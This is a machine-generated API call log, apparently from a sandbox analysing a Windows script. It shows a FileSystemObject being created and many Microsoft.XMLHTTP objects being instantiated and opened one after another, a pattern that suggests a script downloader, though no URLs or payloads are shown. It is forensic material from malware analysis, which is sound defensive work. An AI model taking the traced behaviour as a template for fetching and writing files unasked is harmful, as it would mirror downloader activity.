	[0337.138] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0337.138] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0337.138] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0337.138] SysStringLen (param_1=0x0) returned 0x0
	[0337.138] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0337.142] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0337.142] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0337.142] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0337.142] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0337.142] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0337.142] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0338.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0338.060] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0338.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0338.061] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0338.061] SysStringLen (param_1=0x0) returned 0x0
	[0338.061] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0338.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0338.062] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0338.062] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0338.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b88) returned 0x0
	[0338.062] ??2@YAPEAX_K@Z () returned 0x62f330
	[0338.062] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b88, pUnkSite=0x62f330) 
	[0338.062] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0338.062] XMLHTTPRequest:IUnknown:Release (This=0x49c5b88) returned 0x0
	[0338.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0338.062] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0338.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0338.062] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0338.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.065] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0338.065] SysStringLen (param_1=0x0) returned 0x0
	[0338.065] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0338.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0338.065] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0338.065] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0338.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0338.066] ??2@YAPEAX_K@Z () returned 0x62f310
	[0338.066] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0338.066] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0338.066] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0338.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0338.066] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0338.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0338.066] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0338.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.066] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0338.066] SysStringLen (param_1=0x0) returned 0x0
	[0338.066] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0338.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0338.066] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0338.066] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0338.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0338.067] ??2@YAPEAX_K@Z () returned 0x62f330
	[0338.067] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0338.067] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0338.067] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0338.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0338.067] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0338.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0338.067] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0338.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.067] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0338.067] SysStringLen (param_1=0x0) returned 0x0
	[0338.067] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0338.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0338.067] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0338.067] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0338.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0338.067] ??2@YAPEAX_K@Z () returned 0x62f310
	[0338.068] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0338.068] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0338.068] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0338.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0338.068] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0338.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0338.068] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0338.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.068] longjmp () 
	[0338.068] longjmp () 
	[0338.068] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0338.068] SysStringLen (param_1=0x0) returned 0x0
	[0338.068] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0338.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0338.069] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0338.069] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0338.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0338.069] ??2@YAPEAX_K@Z () returned 0x62f330
	[0338.069] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f330) 
	[0338.069] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0338.069] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0338.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0338.069] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0338.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0338.069] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0338.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.069] longjmp () 
	[0338.069] longjmp () 
	[0338.069] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0338.070] SysStringLen (param_1=0x0) returned 0x0
	[0338.070] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0338.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
